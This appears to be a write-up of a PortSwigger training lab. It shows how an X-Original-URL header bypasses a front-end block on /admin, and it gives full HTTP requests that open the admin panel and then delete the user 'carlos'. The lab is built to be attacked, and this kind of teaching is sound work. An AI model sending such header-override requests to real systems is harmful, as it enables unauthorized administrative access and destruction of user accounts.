Skip to content

Insecure direct object references

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.

To solve the lab, access the admin panel and delete the user carlos.

Point: PRACTITIONER

Recon

The admin panel is reveal to us but when we try to access it, the server return "Access denied"

Exploit

Some applications support non-standard headers such as X-Original-URL or X-Rewrite-URL in order to allow overriding the target URL in requests with the one specified in the header value.

When the backend doesn't remove X-Original-URL or X-Rewrite-URL when forward to backend, we can use that to bypass blocking from access /admin panel.

When request GET to allow path like /, add X-Original-Url: /admin to override the url to /admin and bypass to admin panel.

GET / HTTP/2
Host: 0a4400ee0411678b8085e9c3006100cc.web-security-academy.net
Cookie: session=redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Original-Url: /admin
Referer: https://0a4400ee0411678b8085e9c3006100cc.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

The server response with section that we can remove carlos user

<section>
    <h1>Users</h1>
    <div>
        <span>wiener - </span>
        <a href="/admin/delete?username=wiener">Delete</a>
    </div>
    <div>
        <span>carlos - </span>
        <a href="/admin/delete?username=carlos">Delete</a>
    </div>
</section>

admin_panel.png

Using the url form selection section above, change the url form X-Original-Url: /admin to X-Original-Url: /admin/delete and add param to GET request to remove user carlos.

GET /?username=carlos HTTP/2
Host: 0a4400ee0411678b8085e9c3006100cc.web-security-academy.net
Cookie: session=redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Original-Url: /admin/delete
Referer: https://0a4400ee0411678b8085e9c3006100cc.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
solved.png